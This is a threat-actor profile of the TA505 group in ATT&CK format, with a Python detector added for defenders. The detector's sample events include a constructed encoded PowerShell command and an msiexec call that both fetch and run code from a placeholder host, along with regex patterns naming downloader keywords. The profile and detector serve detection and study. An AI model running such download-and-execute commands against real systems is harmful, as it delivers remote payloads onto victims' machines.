
TA505

TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)
ID: G0092
Associated Groups: Hive0065, CHIMBORAZO, Spandex Tempest
Version: 3.0
Created: 28 May 2019
Last Modified: 10 Apr 2024

Associated Group Descriptions

Name Description
Hive0065 (Citation: IBM TA505 April 2020)
CHIMBORAZO (Citation: Microsoft Threat Actor Naming July 2023)
Spandex Tempest (Citation: Microsoft Threat Actor Naming July 2023)

Techniques Used

Domain ID Name Use
Enterprise T1087 .003 Account Discovery: Email Account

TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.(Citation: Trend Micro TA505 June 2019)

Enterprise T1583 .001 Acquire Infrastructure: Domains

TA505 has registered domains to impersonate services such as Dropbox to distribute malware.(Citation: Korean FSI TA505 2020)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

TA505 has used HTTP to communicate with C2 nodes.(Citation: IBM TA505 April 2020)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

TA505 has used PowerShell to download and execute malware and reconnaissance scripts.(Citation: Proofpoint TA505 Sep 2017)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)

Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

TA505 has executed commands using cmd.exe.(Citation: Trend Micro TA505 June 2019)

Enterprise T1059 .005 Command and Scripting Interpreter: Visual Basic

TA505 has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Trend Micro TA505 June 2019)(Citation: IBM TA505 April 2020)

Enterprise T1059 .007 Command and Scripting Interpreter: JavaScript

TA505 has used JavaScript for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

TA505 has used malware to gather credentials from Internet Explorer.(Citation: Proofpoint TA505 Sep 2017)

Enterprise T1568 .001 Dynamic Resolution: Fast Flux DNS

TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.(Citation: Trend Micro TA505 June 2019)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

TA505 has used malware to disable Windows Defender.(Citation: Korean FSI TA505 2020)

Enterprise T1559 .002 Inter-Process Communication: Dynamic Data Exchange

TA505 has leveraged malicious Word documents that abused DDE.(Citation: Proofpoint TA505 June 2018)

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

TA505 has used UPX to obscure malicious code.(Citation: IBM TA505 April 2020)

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

TA505 has used base64 encoded PowerShell commands.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

TA505 has password-protected malicious Word documents.(Citation: Proofpoint TA505 Sep 2017)

Enterprise T1588 .001 Obtain Capabilities: Malware

TA505 has used malware such as Azorult and Cobalt Strike in their operations.(Citation: NCC Group TA505)

Enterprise T1588 .002 Obtain Capabilities: Tool

TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.(Citation: NCC Group TA505)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

TA505 has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)

Enterprise T1566 .002 Phishing: Spearphishing Link

TA505 has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

TA505 has been seen injecting a DLL into winword.exe.(Citation: IBM TA505 April 2020)

Enterprise T1608 .001 Stage Capabilities: Upload Malware

TA505 has staged malware on actor-controlled domains.(Citation: Korean FSI TA505 2020)

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

TA505 has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)

Enterprise T1553 .005 Subvert Trust Controls: Mark-of-the-Web Bypass

TA505 has used .iso files to deploy malicious .lnk files.(Citation: TrendMicro TA505 Aug 2019)

Enterprise T1218 .007 System Binary Proxy Execution: Msiexec

TA505 has used msiexec to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)

Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

TA505 has leveraged rundll32.exe to execute malicious DLLs.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)

Enterprise T1552 .001 Unsecured Credentials: Credentials In Files

TA505 has used malware to gather credentials from FTP clients and Outlook.(Citation: Proofpoint TA505 Sep 2017)

Enterprise T1204 .001 User Execution: Malicious Link

TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)

Enterprise T1204 .002 User Execution: Malicious File

TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)

Enterprise T1078 .002 Valid Accounts: Domain Accounts

TA505 has used stolen domain admin accounts to compromise additional hosts.(Citation: IBM TA505 April 2020)
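Several of the techniques in the table above (T1027.010 base64-encoded PowerShell, T1218.007 msiexec fetching a remote installer, T1218.011 rundll32 loading a DLL) leave the same evidence: a process-creation record whose command line carries the indicator. The detector below is an added example for illustration, not code from MITRE ATT&CK, SECURITM, or any of the cited reports. It runs over constructed sample events (the `SAMPLE_EVENTS` list, the `placeholder.invalid` host and the file paths are all made up for this example), decodes `-EncodedCommand` arguments the way PowerShell does (base64 over UTF-16LE), and applies simple heuristics; which strings count as download-and-execute indicators and which directories count as user-writable are this example's assumptions, not rules from the page.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """Build the base64/UTF-16LE form PowerShell expects after -EncodedCommand.
    Used here only to construct realistic sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (hypothetical; not from any real incident).
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"pid": 1002, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')")},
    {"pid": 1003, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://placeholder.invalid/update.msi"},
    {"pid": 1004, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\installers\app.msi /qn"},
    {"pid": 1005, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\Libraries\helper.dll,Start"},
    {"pid": 1006, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so capture the flag text and check it against the full parameter name below.
ENC_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)
# Assumed download-and-execute indicators in the decoded script.
DOWNLOADER = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
                        r"\bIEX\b|Invoke-Expression|FromBase64String", re.I)
URL = re.compile(r"https?://", re.I)
# Assumed user-writable locations from which a signed system binary should not load code.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    for flag, blob in ENC_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ExecutionPolicy: starts with 'e' but is a different parameter
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            return raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None

def analyze_event(event: dict) -> list:
    """Map one process-creation record to a list of finding tags (empty if benign)."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    findings = []
    if image.endswith("powershell.exe"):
        script = decode_encoded_command(cmd)
        if script is not None:
            findings.append("encoded_powershell")        # T1027.010 via T1059.001
            if DOWNLOADER.search(script):
                findings.append("encoded_downloader")   # download-and-execute in the payload
    elif image.endswith("msiexec.exe") and URL.search(cmd):
        findings.append("msiexec_remote_package")        # T1218.007
    elif image.endswith("rundll32.exe") and USER_WRITABLE.search(cmd):
        findings.append("rundll32_user_writable_dll")    # T1218.011
    return findings

def scan(events) -> dict:
    """Return {pid: findings} for every event that produced at least one finding."""
    results = {}
    for event in events:
        findings = analyze_event(event)
        if findings:
            results[event["pid"]] = findings
    return results

if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

The point of decoding rather than just flagging `-enc` is triage: an encoded command is common in legitimate automation, but an encoded command that contains a downloader pattern is a much stronger signal and can be surfaced with the decoded text attached. The `image` field is checked separately from the command line so that a renamed copy of the binary does not defeat the image match by itself; in a real pipeline the same logic would be fed from Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled.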

Software

ID Name References Techniques
S0266 TrickBot (Citation: CrowdStrike Wizard Spider October 2020) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TA505 April 2020) (Citation: IBM TrickBot Nov 2016) (Citation: Microsoft Totbrick Oct 2017) (Citation: Proofpoint TA505 Sep 2017) (Citation: S2 Grupo TrickBot June 2017) (Citation: TSPY_TRICKLOAD) (Citation: Totbrick) (Citation: Trend Micro Totbrick Oct 2016) (Citation: TrendMicro Trickbot Feb 2019) Scheduled Task, VNC, System Owner/User Discovery, Standard Encoding, Encrypted/Encoded File, Permission Groups Discovery, Bootkit, Malicious File, Symmetric Cryptography, Local Account, Windows Service, Spearphishing Link, Spearphishing Attachment, Component Object Model, Password Managers, System Service Discovery, Code Signing, Credentials in Registry, Network Share Discovery, System Information Discovery, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Remote Access Tools, Masquerading, Process Injection, Email Account, Time Based Evasion, Browser Session Hijacking, Modify Registry, Credentials from Web Browsers, External Proxy, System Network Configuration Discovery, Domain Trust Discovery, File and Directory Discovery, Credentials In Files, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Exploitation of Remote Services, Registry Run Keys / Startup Folder, Disable or Modify Tools, Non-Standard Port, Process Hollowing, Credential Stuffing, Obfuscated Files or Information, Uncommonly Used Port, Hidden Window, Windows Command Shell, Software Packing, Web Protocols, Remote System Discovery, Ingress Tool Transfer, Fallback Channels, Credential API Hooking, Firmware Corruption, Commonly Used Port
S0039 Net (Citation: Microsoft Net Utility) (Citation: Savill 1999) (Citation: Trend Micro TA505 June 2019) Domain Account, Local Account, Domain Groups, System Service Discovery, Network Share Discovery, Additional Local or Domain Groups, SMB/Windows Admin Shares, Local Account, Domain Account, System Network Connections Discovery, Local Groups, Network Share Connection Removal, Password Policy Discovery, Remote System Discovery, Service Execution, System Time Discovery
S1025 Amadey (Citation: BlackBerry Amadey 2020) (Citation: Korean FSI TA505 2020) System Owner/User Discovery, Fast Flux DNS, System Information Discovery, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Modify Registry, System Network Configuration Discovery, File and Directory Discovery, Mark-of-the-Web Bypass, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Obfuscated Files or Information, System Location Discovery, Security Software Discovery, Web Protocols, Ingress Tool Transfer
S0521 BloodHound (Citation: CrowdStrike BloodHound April 2018) (Citation: FoxIT Wocao December 2019) (Citation: GitHub Bloodhound) (Citation: NCC Group TA505) System Owner/User Discovery, Group Policy Discovery, Domain Account, Local Account, Domain Groups, Native API, Archive Collected Data, Domain Trust Discovery, PowerShell, Local Groups, Password Policy Discovery, Remote System Discovery
S0460 Get2 (Citation: Proofpoint TA505 October 2019) System Owner/User Discovery, System Information Discovery, Command and Scripting Interpreter, Process Discovery, Web Protocols, Dynamic-link Library Injection
S0194 PowerSploit (Citation: GitHub PowerSploit May 2012) (Citation: NCC Group TA505) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) Scheduled Task, Windows Management Instrumentation, Screen Capture, Keylogging, Path Interception by PATH Environment Variable, Audio Capture, Local Account, Windows Service, DLL, Credentials in Registry, Data from Local System, Reflective Code Loading, Security Support Provider, Path Interception by Search Order Hijacking, LSASS Memory, Domain Trust Discovery, Group Policy Preferences, Process Discovery, PowerShell, Registry Run Keys / Startup Folder, Indicator Removal from Tools, Path Interception by Unquoted Path, Query Registry, Path Interception, Windows Credential Manager, Command Obfuscation, Access Token Manipulation, Kerberoasting, Dynamic-link Library Injection
S0383 FlawedGrace (Citation: Proofpoint TA505 Jan 2019) (Citation: Proofpoint TA505 October 2019) (Citation: Trend Micro TA505 June 2019) Encrypted/Encoded File, Custom Command and Control Protocol, Commonly Used Port
S0381 FlawedAmmyy (Citation: Proofpoint TA505 Mar 2018) (Citation: Proofpoint TA505 October 2019) (Citation: Trend Micro TA505 June 2019) Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Rundll32, Keylogging, Symmetric Cryptography, Clipboard Data, Peripheral Device Discovery, System Information Discovery, Msiexec, Data from Local System, Exfiltration Over C2 Channel, PowerShell, Registry Run Keys / Startup Folder, Local Groups, Data Obfuscation, Input Capture, Security Software Discovery, Windows Command Shell, File Deletion, Web Protocols, Ingress Tool Transfer, Commonly Used Port
S0461 SDBbot (Citation: IBM TA505 April 2020) (Citation: Proofpoint TA505 October 2019) System Owner/User Discovery, Rundll32, System Information Discovery, Data from Local System, Deobfuscate/Decode Files or Information, Application Shimming, Image File Execution Options Injection, Video Capture, System Network Configuration Discovery, Proxy, Indicator Removal, File and Directory Discovery, Process Discovery, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Non-Application Layer Protocol, System Location Discovery, Windows Command Shell, File Deletion, Software Packing, Ingress Tool Transfer, Remote Desktop Protocol, Dynamic-link Library Injection
S0154 Cobalt Strike (Citation: NCC Group TA505) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0382 ServHelper (Citation: Cybereason TA505 April 2019) (Citation: Deep Instinct TA505 Apr 2019) (Citation: Proofpoint TA505 Jan 2019) (Citation: Trend Micro TA505 June 2019) Scheduled Task, System Owner/User Discovery, Rundll32, System Information Discovery, Additional Local or Domain Groups, Local Account, PowerShell, Registry Run Keys / Startup Folder, Asymmetric Cryptography, Windows Command Shell, Masquerade Account Name, File Deletion, Web Protocols, Ingress Tool Transfer, Remote Desktop Protocol, Commonly Used Port
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: NCC Group TA505) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0611 Clop (Citation: Cybereason Clop Dec 2020) (Citation: Mcafee Clop Aug 2019) (Citation: Unit42 Clop April 2021) Service Stop, Code Signing, Network Share Discovery, Msiexec, Native API, Deobfuscate/Decode Files or Information, Time Based Evasion, Modify Registry, File and Directory Discovery, Process Discovery, Disable or Modify Tools, Data Encrypted for Impact, System Language Discovery, Security Software Discovery, Windows Command Shell, Software Packing, Inhibit System Recovery
S0384 Dridex (Citation: Bugat v5) (Citation: Checkpoint Dridex Jan 2021) (Citation: Dell Dridex Oct 2015) (Citation: IBM TA505 April 2020) (Citation: Kaspersky Dridex May 2017) (Citation: Proofpoint TA505 June 2018) (Citation: Proofpoint TA505 Sep 2017) (Citation: Treasury EvilCorp Dec 2019) Scheduled Task, Malicious File, Symmetric Cryptography, DLL, System Information Discovery, Native API, Remote Access Tools, Browser Session Hijacking, Proxy, Multi-hop Proxy, Obfuscated Files or Information, Regsvr32, Asymmetric Cryptography, Web Protocols, Software Discovery
S0552 AdFind (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) (Citation: NCC Group TA505) (Citation: Red Canary Hospital Thwarted Ryuk October 2020) Domain Account, Domain Groups, System Network Configuration Discovery, Domain Trust Discovery, Remote System Discovery
S0344 Azorult (Citation: NCC Group TA505) (Citation: Proofpoint Azorult July 2018) (Citation: Unit42 Azorult Nov 2018) Screen Capture, System Owner/User Discovery, Symmetric Cryptography, System Information Discovery, Deobfuscate/Decode Files or Information, Credentials from Web Browsers, Create Process with Token, System Network Configuration Discovery, File and Directory Discovery, Credentials In Files, Process Discovery, Process Hollowing, Query Registry, File Deletion, Ingress Tool Transfer, System Time Discovery

References

  1. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved September 16, 2024.
  2. Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
  3. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
  4. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
  5. Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.
  6. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  7. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.
  8. Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021.
  9. Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.
  10. Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.
  11. Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.
  12. Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.
  13. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
  14. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
